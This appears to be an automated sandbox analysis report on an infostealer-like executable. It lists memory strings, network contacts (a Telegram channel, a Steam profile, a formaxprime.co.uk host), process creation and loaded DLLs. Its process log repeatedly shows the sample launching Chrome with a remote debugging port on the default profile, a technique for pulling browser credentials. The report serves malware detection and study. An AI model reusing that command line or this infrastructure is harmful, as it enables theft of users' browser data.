              Source: chrome.exe, 0000000C.00000003.2368131775.00005790000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2440856608.00001D70000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2441975397.0000019852A38000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2910763752.00004AC8000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2913446931.00000151EF2A9000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.3483222228.00001028000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.3484917203.000002C188C08000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.3617596899.00004718000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.3949682834.00006E08000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.4389139326.00003DE0000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.4390386867.000001E34F488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
              Source: chrome.exe, 0000000C.00000002.6005702865.00003CCC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5946881406.00003CCC00174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
              Source: wt26ph.0.drString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
              Source: wt26ph.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: chrome.exe, 0000000C.00000002.6598026417.00003CCC00550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
              Source: chrome.exe, 0000000C.00000003.2420626371.00003CCC01898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2420162161.00003CCC01848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2420798445.00003CCC017AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.google.com/icons?selected=Material
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic/intro?20
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic2
              Source: chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
              Source: chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
              Source: chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
              Source: chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Pre
              Source: chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
              Source: chrome.exe, 0000000C.00000002.5771387251.00003CCC00004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
              Source: wt26ph.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
              Source: chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/gen204
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
              Source: chrome.exe, 0000000C.00000002.5805027972.00003CCC00068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
              Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
              Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
              Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
              Source: chrome.exe, 0000000C.00000002.6005702865.00003CCC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
              Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
              Source: chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2418998130.00003CCC0174C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/calendar/
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://people.googleapis.com/
              Source: chrome.exe, 0000000C.00000002.6598026417.00003CCC00550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
              Source: chrome.exe, 0000000C.00000002.5864508558.00003CCC0011C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5817119523.00003CCC00094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
              Source: chrome.exe, 0000000C.00000002.6206613229.00003CCC002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.google.cmanager.com
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199832267488
              Source: random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199832267488dqu220Mozilla/5.0
              Source: random(2).exe, 00000000.00000003.1079632033.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079609497.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/g_etcontent
              Source: random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/g_etcontentdqu220Mozilla/5.0
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
              Source: random(2).exe, 00000000.00000003.1079632033.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1096240844.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1110484696.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000BB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
              Source: wt26ph.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
              Source: chrome.exe, 0000000C.00000002.5871320655.00003CCC00128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
              Source: chrome.exe, 0000000C.00000002.6585183116.00003CCC0053D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: wt26ph.0.drString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
              Source: random(2).exe, 00000000.00000003.1079632033.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk
              Source: random(2).exe, 00000000.00000003.1096240844.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1110484696.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/
              Source: random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk//
              Source: random(2).exe, 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/5
              Source: random(2).exe, 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/G
              Source: random(2).exe, 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1096240844.0000000000B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/a
              Source: random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/j
              Source: random(2).exe, 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/m
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukK
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukZ
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukb
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukg
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukq
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukv
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
              Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.10:49681 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.10:49682 version: TLS 1.2

              System Summary

              barindex
              Source: random(2).exeStatic PE information: section name:
              Source: random(2).exeStatic PE information: section name: .idata
              Source: random(2).exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\random(2).exeProcess Stats: CPU usage > 49%
              Source: random(2).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: random(2).exeStatic PE information: Section: ZLIB complexity 0.9982289459745762
              Source: random(2).exeStatic PE information: Section: xyhrtgkn ZLIB complexity 0.9948176319648094
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@34/1@4/4
              Source: C:\Users\user\Desktop\random(2).exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\F0CK4TZV.htmJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: random(2).exeVirustotal: Detection: 50%
              Source: random(2).exeReversingLabs: Detection: 58%
              Source: unknownProcess created: C:\Users\user\Desktop\random(2).exe "C:\Users\user\Desktop\random(2).exe"
              Source: C:\Users\user\Desktop\random(2).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2296,i,9997688068787143346,17471011568796092826,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2464 /prefetch:3
              Source: C:\Users\user\Desktop\random(2).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Users\user\Desktop\random(2).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Users\user\Desktop\random(2).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Users\user\Desktop\random(2).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Users\user\Desktop\random(2).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Users\user\Desktop\random(2).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Users\user\Desktop\random(2).exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2296,i,9997688068787143346,17471011568796092826,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2464 /prefetch:3Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\random(2).exeSection loaded: ntmarta.dllJump to behavior
